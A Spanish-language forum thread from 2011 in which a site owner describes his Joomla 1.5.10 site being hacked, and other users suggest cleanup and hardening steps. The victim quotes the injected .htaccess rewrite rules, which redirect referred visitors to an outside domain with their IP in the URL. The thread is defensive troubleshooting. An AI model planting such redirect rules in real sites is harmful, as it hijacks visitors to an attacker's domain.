Tema: ¿Creación ".htaccess" en Joomla automáticamente?

13/01/2011, 19:29

Hola a todos.

Recientemente (12/01/2011) mi web personal, http://www.prittonline.es/, ha sido atacada por "yagizmo".

Aún estoy investigando como ha podido suceder ya que está alojada en un server de "strato", que se supone bastante seguro.

El ataque ha consistido en modificar todos los ".htaccess", redireccionando las páginas a la dirección de yagizmo:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://yagizmo.com/%{REMOTE_ADDR}

La solucción ha pasado por eliminarlos.

La web está instalada sobre Joomla Versión 1.5.10.

Tengo instalado un plugin de sistema SEF (no recuerdo cuál en concreto) para hacer las direcciones "amigables".

Este plugins se encarga de crear los .htaccess.

Al eliminarlos (los .htaccess) solamente se puede acceder a la página principal y el resto de enlaces tira error 404 (página no encontrada).

Por desgracia la copia de seguridad que tengo está desfasada y no recoge los últimos cambios que hice.

La pregunta:

¿Conocéis alguna forma de soluccionarlo?

He pensado en hacer copia de seguridad, desinstalar el plugin SEF y luego volver a instalarlo, pero no sé si esto corregirá el problema del todo.

Un saludo.

13/01/2011, 22:29

Puedes hacer una instalación de Joomla en local, pillar el htacess por defecto y meterlo.

Aunque el SEF es el que modifica ese htaccess, por lo que deberías desinstalarlo e instalarlo de nuevo

13/01/2011, 23:25

De momento, simplemente desactivando el SEO en Joomla, la web funciona correctamente, aunque con las direcciones "no amigables".

Veremos cómo puedo crear los .htaccess.

Hacerlo de una copia local lo veo inviable porque son un montón (uno por directorio) y copiarlos "a pedales" es faena de chinos.

Un saludo.

13/01/2011, 23:26

Entonces lo ideal es que desinstales ese módulo, lo instales y así se generarán los htaccess

13/01/2011, 23:36

Bueno, me preocupaba que tuve que borrar un montón de .htaccess creados en el ataque.

Le he metido el htaccess.txt, lo he renombrado, activado y desactivado el módulo y soluccionado.

Creo que ya está funcionando correctamente.

Por favor, si véis algún error, decídmelo para soluccionarlo.

Ahora toca investigar cuál es el fallo de seguridad.

Un saludo.

13/01/2011, 23:54

Yo te recomiendo:

- actualizar versión de php
- cambiar pass del ftp: aquí es normalmente por donde suelen colarse; una larguita con símbolos (guiones bajos, guiones), mayusculas, etc.
- actualizar joomla: la última estable en español es la 1.5.22, a espera de que se traduzca la 1.6, claro.
- también te recomiendo que uses un cliente ftp free, como Filezilla. Ya sabemos si se usan algunos "dudosos", que puedan capturar contraseñas, etc.

También puedes pedir un log de conexiones (ftp, ssh, etc) del día del ataque a tu hosting, que debe estar creado en el servidor. Así puedes localizar por dónde entró y su IP, aunque seguramente usaría un proxy anónimo.

15/01/2011, 17:22

Tengo Joomla Versión 1.5.10 en un servidor compartido. Y no sabemos todavía que a podido ser el exploit causante, ni como.

15/01/2011, 17:28

Aquí han tenido el mismo problema en un software parecido a Joomla! (http://expressionengine.com). La vulnerabilidad es posible que sea del servidor... no?

http://expressionengine.com/forums/viewthread/178258/

suerte

15/01/2011, 20:54

Por lo que he visto es una vulnaribilidad del Joomla 1.5.10.

Un saludo.

Tema: ¿Creación ".htaccess" en Joomla automáticamente?

¿Creación ".htaccess" en Joomla automáticamente?

Tengo el mismo problema (desde ese mismo día)